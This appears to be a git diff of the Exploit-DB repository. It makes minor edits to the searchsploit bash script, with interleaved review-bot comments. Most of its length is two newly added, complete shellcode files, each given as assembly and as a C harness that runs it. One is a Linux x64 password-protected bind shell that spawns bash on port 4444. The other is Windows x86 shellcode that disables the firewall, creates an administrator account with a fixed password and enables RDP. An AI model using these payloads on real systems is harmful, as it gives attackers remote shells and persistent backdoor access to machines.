2>/dev/null >/dev/null #dpkg -l "${package}" 2>/dev/null >/dev/null if [[ "$?" == "0" ]]; then updatedeb "${package}" else - # Update from homebrew (e.g. OSX) + ## Update from homebrew (e.g. OSX) brew 2>/dev/null >/dev/null if [[ "$?" == "0" ]]; then - # This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently + ## This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently updatedbrew "${package}" fi - # Update via Git + ## Update via Git updategit "${package}" "${path}" "${git}" fi done - # Done + ## Done exit 6 } 
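Review bot: The new `apt-cache search "${package}"` on the `## Update from the repos` line does not test whether the package exists, because apt-cache search exits 0 even when it prints no match, so on any host with apt the following `if [[ "$?" == "0" ]]` now always takes the updatedeb branch; it is also a substring/regex search, so an unrelated package whose description contains the name would satisfy it. A query that fails for an unknown package, `if apt-cache show "${package}" >/dev/null 2>&1; then`, keeps what appears to be the intended branch selection, and the commented-out `#dpkg -l` remainder on the same line can then go. The same `cmd; if [[ "$?" == "0" ]]` shape is used for the brew probe below and could be folded into the `if` the same way. update() begins before this hunk.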
@@ -185,7 +185,7 @@ function updatedeb() { function updatedbrew() { package_in="${1}" - echo -e "[i] Updating via brew package management.\n" + echo -e "[i] Updating via brew package management\n" brew update \ || echo -e "\n[-] Issue with brew update (Please check network connectivity)" 1>&2 @@ -315,7 +315,7 @@ function searchsploitout() { tmp="" for word in $( echo ${software} ); do ## Add current search term on - tmp="${tmp}${word} " + tmp="${tmp}${word}" ## Check to see if its any phrases which would give a TON of incorrect results validterm "${tmp}" \ @@ -328,14 +328,18 @@ function searchsploitout() { ## Are there too many results? lines=$( echo -e "${out}" | wc -l ) if [[ "${lines}" -gt 100 ]]; then - echo -e "[-] Skipping output: ${tmp} (Too many results. Please re-search manually: $0 ${arg} ${tmp})\n" 1>&2 + echo -e "[-] Skipping output: ${tmp} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${tmp})\n" 1>&2 ## Are there any results? elif [[ "${lines}" -gt 5 ]]; then echo -e "${out}\n\n" ## If there's no results else + ## Exit for loop break fi + + ## Space out for the next word + tmp="${tmp} " done ## Padding between loops @@ -352,7 +356,7 @@ function searchsploitout() { ## Are there too many results? lines=$( echo -e "${out}" | wc -l ) if [[ "${lines}" -gt 100 ]]; then - echo -e "[-] Skipping output: ${software} (Too many results. Please re-search manually: $0 ${arg} ${software})\n" 1>&2 + echo -e "[-] Skipping output: ${software} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${software})\n" 1>&2 ## Are there any results? elif [[ "${lines}" -gt 5 ]]; then echo -e "${out}\n\n" @@ -390,6 +394,7 @@ function nmapxml() { ;; "[PRODUCT]") ## We have a name, but no version (yet?) e.g. dnsmasq + echo "${software}" software="${input}" echo "${software}" ;; 
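Review bot: The `echo "${software}"` added in the `"[PRODUCT]"` case of nmapxml() runs before `software` is reassigned, so when no earlier product is pending it emits an empty line into the function's output; if that output is consumed as search terms further on, an empty term would be passed along. Guarding it as `[[ -n "${software}" ]] && echo "${software}"` keeps the flush of the previous name without the blank line. nmapxml() begins and ends outside this hunk, so the initial value of `software` is not visible here.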
@@ -412,7 +417,8 @@ function buildterms() { ## If we are to use colour ("--colour"), add the values to search for between "or" if [[ "${COLOUR}" -eq 1 ]]; then - [[ "${COLOUR_TAG}" ]] && COLOUR_TAG="${COLOUR_TAG}|" + [[ "${COLOUR_TAG}" ]] \ + && COLOUR_TAG="${COLOUR_TAG}|" COLOUR_TAG="${COLOUR_TAG}${tag_in}" fi @@ -490,7 +496,7 @@ function findresults() { ## EXACT search command ("-e") if [[ "${EXACT}" -eq 1 ]]; then - buildterms "${TAGS}" + buildterms "${TAGS}" ## or AND search command? else ## For each term @@ -645,6 +651,7 @@ function findresults() { OUTPUT="$( echo "${OUTPUT}" \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort -f )" + #| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ fi @@ -711,8 +718,8 @@ elif [[ -f "/etc/searchsploit_rc" ]]; then elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ]]; then rc_file="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.searchsploit_rc" ## Method #2 - Symbolic link -elif [[ -f "$( dirname "$( readlink "$0")" )/.searchsploit_rc" ]]; then - rc_file="$( dirname "$( readlink "$0")" )/.searchsploit_rc" +elif [[ -f "$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ]]; then + rc_file="$( dirname "$( readlink "$0" )" )/.searchsploit_rc" ## Manually specified? elif [[ ! -f "${rc_file}" ]]; then echo "[!] Could not find: rc_file ~ ${rc_file}" @@ -915,7 +922,7 @@ if [[ "${GETPATH}" -eq 1 ]]; then title=$( grep -m 1 "${path}" "${files}" | cut -d ',' -f 3 | sed 's/"//g' ) ## File type - fileinfo="$(file -b "${location}")" + fileinfo="$( file -b "${location}" )" ## How long is the name? PADDING=$(( 9 - ${#name} )) diff --git a/shellcodes/linux/48379.c b/shellcodes/linux/48379.c new file mode 100644 index 000000000..72e38e10d --- /dev/null +++ b/shellcodes/linux/48379.c 
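Review bot: The added `#| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \` in findresults() is commented-out code placed after the closing `)"` of the OUTPUT assignment, so it is neither part of the pipeline nor runnable where it sits, and the trailing backslash on a comment line does nothing. Either splice it into the pipeline ahead of `| sort -f` or drop the line; if it is meant as a reminder, a plain `## TODO: strip the exploits/ shellcodes/ papers/ prefix from the path column` states the intent without dead code. findresults() begins and ends outside this hunk.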
@@ -0,0 +1,194 @@ +## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) +## Exploit Author: Bobby Cooke +## Date: 2020-04-23 +## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1 +## SLAE/Student ID: PA-10913 +## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com. +## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client. +## Example: +# user$ nc 127.0.0.1 4444 +# M@G1C WOrDz IZ??asd +# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ +# id +# uid=0(root) gid=0(root) groups=0(root) + +; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); +; rax = 0x29 ; rdi = 0x2 = AF_INET +; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP +xor rsi, rsi ; clear rsi +mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP +add al, 0x29 ; rax = 0x29 = socket syscall +inc rsi ; rsi = 0x1 = SOCK_STREAM +push rsi +pop rdi ; rdi = 0x1 +inc rdi ; rdi = 0x2 = AF_INET +syscall ; socket syscall ; RAX returns socket File-Descriptor + +; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr)); +; rax = 0x31 ; rdi = 0x3 = ipv4Socket +; rsi = &ipSocketAddr ; rdi = 0x10 +; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00 +; Address-Family| PORT| IP Address| 8 bytes of zeros +xchg rdi, rax ; RDI = sockfd / ipv4Socket +xor rax, rax +add al, 0x31 ; rax = 0x31 = socket syscall +push rdx ; 8 bytes of zeros for second half of struct +push dx ; 4 bytes of zeros for IPADDR_ANY +push dx ; 4 bytes of zeros for IPADDR_ANY +push word 0x5c11 ; push 2 bytes for TCP Port 4444 +inc rdx +inc rdx ; rdx = 0x2 ; dx = 0x0002 +push dx ; 0x2 = AF_INET +add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr) +mov rsi, rsp ; rsi = &ipSocketAddr +syscall + +; int listen(int sockfd, 
int backlog); +; rax = 0x32 = listen syscall +; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0 +xor rax, rax +add al, 0x32 ; listen syscall +xor rsi, rsi ; backlog = 0x0 +syscall + +;accept +; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket +; rsi = 0x0 ; rdx = 0x0 +xor rax, rax +push rax +push rax +pop rdx +pop rsi +add al, 0x2b ; accept syscall +syscall ; accept returns client socket file-descriptor in RAX + +; dup2 +xchg rdi, rax ; RDI = sockfd / ClientSocketFD +xor rsi, rsi +add dl, 0x3 ; Loop Counter +dup2Loop: +xor rax, rax +add al, 0x21 ; RAX = 0x21 = dup2 systemcall +syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR +inc rsi +cmp rsi, rdx ; if 2-STDERR, end loop +jne dup2Loop + +jmp short password + +failer: +; write +; rax = 0x1 ; rdi = fd = 0x1 STDOUT +; rsi = &String ; rdx = sizeof(String) +; String = "REALLY?!" +; !?YLLAER : 213f594c4c414552 +xor rdi, rdi +mul rdi +push rdi +pop rsi +push rsi +mov rsi, 0x213f594c4c414552 +push rsi +mov rsi, rsp ; rsi = &String +inc rax ; rax = 0x1 = write system call +mov rdi, rax +add rdx, 16 ; 16 bytes / size of string +syscall + +password: +; write +; rax = 0x1 ; rdi = fd = 0x1 STDOUT +; rsi = &String ; rdx = sizeof(String) +; String = "M@G1C WOrDz IZ??" 
+; ??ZI zDr : 3f3f5a49207a4472 +; OW C1G@M : 4f5720433147404d +xor rdi, rdi +mul rdi +push rdi +pop rsi +push rsi +mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr +push rsi +mov rsi, 0x4f5720433147404d ; OW C1G@M +push rsi +mov rsi, rsp ; rsi = &String +inc rax ; rax = 0x1 = write system call +mov rdi, rax +add rdx, 16 ; 16 bytes / size of string +syscall + +; read +; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN +; rsi = Write to &String ; rdx = 0x12 = sizeof(String) +xor rdi, rdi +push rdi +mul rdi ; rdx =0x0 ; rax = 0x0 = write system call +mov rsi, rsp ; rsi = [RSP] = &String +add rdx, 12 ; 12 bytes / size of password +syscall + +; String = P3WP3Wl4ZerZ +; ZreZ : 5a72655a +; 4lW3PW3P : 346c573350573350 +mov rdi, rsp +xor rsi, rsi +add rsi, 0x5a72655a +push rsi +mov rsi, 0x346c573350573350 +push rsi +mov rsi, rsp ; rsi = &String +xor rcx, rcx +add rcx, 0xB +repe cmpsb +jnz failer + +;execve +; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00 +; rsi = 0x0 ; rdx = 0x0 +; "/bin/bash" +; h : 68 +; sab/nib/ : 7361622f6e69622f +xor rsi, rsi +mul rsi ; rdx&rax= 0x0 +xor rdi, rdi +push rdi +add rdx, 0x68 ; "h" +push rdx +mov rdx, 0x7361622f6e69622f ; "/bin/bas" +push rdx +xor rdx, rdx +mov rdi, rsp +mov al, 0x3b ; execve syscall +syscall ; call execve("/bin/bash", NULL, NULL) + +################################################################################ + +// Filename: shellcode.c +// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode +#include <stdio.h> +#include <string.h> + +unsigned char shellcode[] = \ +"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7" +"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68" +"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6" +"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50" +"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48" +"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23" 
+"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c" +"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2" +"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44" +"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57" +"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f" +"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f" +"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48" +"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9" +"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48" +"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69" +"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05"; +int main() +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file diff --git a/shellcodes/windows/48355.c b/shellcodes/windows/48355.c new file mode 100644 index 000000000..c18b5ac02 --- /dev/null +++ b/shellcodes/windows/48355.c 
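Review bot: Several comments in the assembly half of this listing disagree with the instructions they annotate, which matters for a file whose value is explanatory: the read block says `; rsi = Write to &String ; rdx = 0x12 = sizeof(String)` while the code does `add rdx, 12` (0xC), the failer block uses `add rdx, 16` for the 8-byte "REALLY?!" string (the other 8 bytes written are the zero qword pushed just before it), and `add rcx, 0xB` before `repe cmpsb` compares 11 bytes although the header documents a 12-character password. The comments should state the byte counts the code actually uses so readers are not misled. Separately, the file is stored as `.c` but only the part after `// Filename: shellcode.c` is C; the NASM source and `##` header lines above it will not compile, so a note at the top saying the first section is assembly, or moving it to its own `.asm`, would make the listing usable as published.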
@@ -0,0 +1,285 @@ +## Exploit Title: Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) +## Exploit Author: Bobby Cooke +## Date: 2020-04-20 +## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86) +## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service. +## Commands used: +## 'netsh firewall set opmode mode=DISABLE' +## 'net user MajinBuu TurnU2C@ndy!! /add' +## 'net localgroup Administrators MajinBuu /add' +## 'net localgroup "Remote Desktop Users" MajinBuu /add' +## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' + +; Create stack frame +mov ebp, esp +sub esp, 0x30 + +; Find kernel32.dll base address + xor ebx, ebx + mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB + mov ebx, [ebx+0xC] ; EBX = Address_of_LDR + mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll + mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll + mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll + mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll + mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll + +; Find the address of the Export Table within kernel32.dll + mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader + add ebx, eax ; EBX = &NewEXEHeader + mov ebx, [ebx+0x78] ; EBX = RVA ExportTable + add ebx, eax ; EBX = &ExportTable + +; Find the address of the Name Pointer Table within kernel32.dll + mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable + add edi, eax ; EDI = &NamePointerTable + mov [ebp-0x8], edi ; save &NamePointerTable to stack frame + +; Find the address of the Ordinal Table + mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable + add ecx, eax ; ECX = 
&OrdinalTable + mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame + +; Find the address of the Address Table + mov edx, [ebx+0x1C] ; EDX = RVA AddressTable + add edx, eax ; EDX = &AddressTable + mov [ebp-0x10], edx ; save &AddressTable to stack-frame + +; Find Number of Functions within the Export Table of kernel32.dll + mov edx, [ebx+0x14] ; EDX = Number of Functions + mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame + +jmp short functions + +findFunctionAddr: +; Initialize the Counter to prevent infinite loop + xor eax, eax ; EAX = Counter = 0 + mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame +; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll +searchLoop: + mov edi, [ebp-0x8] ; EDI = &NamePointerTable + mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for + xor ecx, ecx ; ECX = 0x00000000 + cld ; clear direction flag - Process strings from left to right + mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] + add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll + add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null + repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00" + jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop + inc eax ; else Counter ++ + cmp eax, edx ; Does EAX == Number of Functions? 
+ jb searchLoop ; If EAX != Number of Functions, then restart the loop + +found: +; Find the address of GetProcAddress by using the last value of the Counter + mov ecx, [ebp-0xC] ; ECX = &OrdinalTable + mov edx, [ebp-0x10] ; EDX = &AddressTable + mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)] + mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber] + add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll + ret + +functions: +# Push string "GetProcAddress",0x00 onto the stack + xor eax, eax ; clear eax register + mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register + push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s" + push 0x65726464 ; erdd : 65726464 // "GetProcAddress" + push 0x41636f72 ; Acor : 41636f72 + push 0x50746547 ; PteG : 50746547 + mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp) + call findFunctionAddr ; After Return EAX will = &GetProcAddress +# EAX = &GetProcAddress + mov [ebp-0x1C], eax ; save &GetProcAddress + +; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00) + xor edx, edx ; EDX = 0x00000000 + push edx ; null terminator for LoadLibraryA string + push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00 + push 0x7262694c ; rbiL : 7262694c + push 0x64616f4c ; daoL : 64616f4c + push esp ; $hModule -- push the address of the start of the string onto the stack + push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack + mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register + call eax ; Call the GetProcAddress Function. 
+ mov [ebp-0x20], eax ; save Address of LoadLibraryA + +; Call LoadLibraryA(PTR "msvcrt") +; push "msvcrt",0x00 to the stack and save pointer + xor eax, eax ; clear eax + mov ax, 0x7472 ; tr : 7472 + push eax + push 0x6376736D ; cvsm : 6376736D + push esp ; push the pointer to the string + mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register + call ebx ; call the LoadLibraryA Function to load msvcrt.dll + mov [ebp-0x24], eax ; save Address of msvcrt.dll + +; Call GetProcAddress(msvcrt.dll, "system") + xor edx, edx + mov dx, 0x6d65 ; me : 6d65 + push edx + push 0x74737973 ; tsys : 74737973 + push esp ; push pointer to string to stack for 'system' + push dword [ebp-0x24] ; push base address of msvcrt.dll to stack + mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX + call eax ; GetProcAddress +; EAX = WSAStartup Address + mov [ebp-0x28], eax ; save Address of msvcrt.system + +; 'netsh firewall set opmode mode=DISABLE' +xor ecx, ecx +mov cx, 0x454c ; EL : 454c +push ecx +push 0x42415349 ; BASI : 42415349 +push 0x443d6564 ; D=ed : 443d6564 +push 0x6f6d2065 ; om e : 6f6d2065 +push 0x646f6d70 ; domp : 646f6d70 +push 0x6f207465 ; o te : 6f207465 +push 0x73206c6c ; s ll : 73206c6c +push 0x61776572 ; awer : 61776572 +push 0x69662068 ; if h : 69662068 +push 0x7374656e ; sten : 7374656e +push esp ; push pointer to string +mov eax, [ebp-0x28] ; msvcrt.system address +call eax ; call system + +; 'net user MajinBuu TurnU2C@ndy!! 
/add'
+xor ecx, ecx
+push ecx
+push 0x6464612f ; dda/ : 6464612f
+push 0x20212179 ; !!y : 20212179
+push 0x646e4043 ; dn@C : 646e4043
+push 0x32556e72 ; 2Unr : 32556e72
+push 0x75542075 ; uT u : 75542075
+push 0x75426e69 ; uBni : 75426e69
+push 0x6a614d20 ; jaM : 6a614d20
+push 0x72657375 ; resu : 72657375
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net localgroup Administrators MajinBuu /add'
+xor ecx, ecx
+push ecx
+mov ecx, 0x64646190 ; dda : 646461
+shr ecx, 8
+push ecx
+push 0x2f207575 ; / uu : 2f207575
+push 0x426e696a ; Bnij : 426e696a
+push 0x614d2073 ; aM s : 614d2073
+push 0x726f7461 ; rota : 726f7461
+push 0x72747369 ; rtsi : 72747369
+push 0x6e696d64 ; nimd : 6e696d64
+push 0x41207075 ; A pu : 41207075
+push 0x6f72676c ; orgl : 6f72676c
+push 0x61636f6c ; acol : 61636f6c
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net localgroup "Remote Desktop Users" MajinBuu /add'
+xor ecx, ecx
+push ecx
+mov ecx, 0x64646190 ; dda : 646461
+shr ecx, 8
+push ecx
+push 0x2f207575 ; / uu : 2f207575
+push 0x426e696a ; Bnij : 426e696a
+push 0x614d2022 ; aM " : 614d2022
+push 0x73726573 ; sres : 73726573
+push 0x5520706f ; U po : 5520706f
+push 0x746b7365 ; tkse : 746b7365
+push 0x44206574 ; D et : 44206574
+push 0x6f6d6552 ; omeR : 6f6d6552
+push 0x22207075 ; " pu : 22207075
+push 0x6f72676c ; orgl : 6f72676c
+push 0x61636f6c ; acol : 61636f6c
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
+xor ecx, ecx
+push ecx
+push 0x662f2030 ; f/ 0 : 662f2030
+push 0x20642f20 ; d/ : 20642f20
+push 0x44524f57 ; DROW : 44524f57
+push 0x445f4745 ; D_GE : 445f4745
+push 
0x5220742f ; R t/ : 5220742f
+push 0x20736e6f ; sno : 20736e6f
+push 0x69746365 ; itce : 69746365
+push 0x6e6e6f43 ; nnoC : 6e6e6f43
+push 0x5354796e ; STyn : 5354796e
+push 0x65446620 ; eDf : 65446620
+push 0x762f2022 ; v/ " : 762f2022
+push 0x72657672 ; revr : 72657672
+push 0x6553206c ; eS l : 6553206c
+push 0x616e696d ; anim : 616e696d
+push 0x7265545c ; reT\ : 7265545c
+push 0x6c6f7274 ; lort : 6c6f7274
+push 0x6e6f435c ; noC\ : 6e6f435c
+push 0x7465536c ; teSl : 7465536c
+push 0x6f72746e ; ortn : 6f72746e
+push 0x6f43746e ; oCtn : 6f43746e
+push 0x65727275 ; erru : 65727275
+push 0x435c4d45 ; C\ME : 435c4d45
+push 0x54535953 ; TSYS : 54535953
+push 0x5c454e49 ; \ENI : 5c454e49
+push 0x4843414d ; HCAM : 4843414d
+push 0x5f4c4143 ; _LAC : 5f4c4143
+push 0x4f4c5f59 ; OL_Y : 4f4c5f59
+push 0x454b4822 ; EKH" : 454b4822
+push 0x20646461 ; dda : 20646461
+push 0x20676572 ; ger : 20676572
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+
+######################################################################################
+#include <windows.h>
+#include <stdio.h>
+
+char code[] = \
+"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
+"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
+"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
+"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
+"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
+"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
+"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
+"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
+"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
+"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
+"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
+"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
+"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
+"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
+"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
+"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
+"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
+"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
+"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
+"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
+"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
+"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
+"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
+"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
+"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
+"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
+"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
+"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
+"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
+"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
+"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int(*)()) code;
+ 
(int)(*func)();
+}
\ No newline at end of file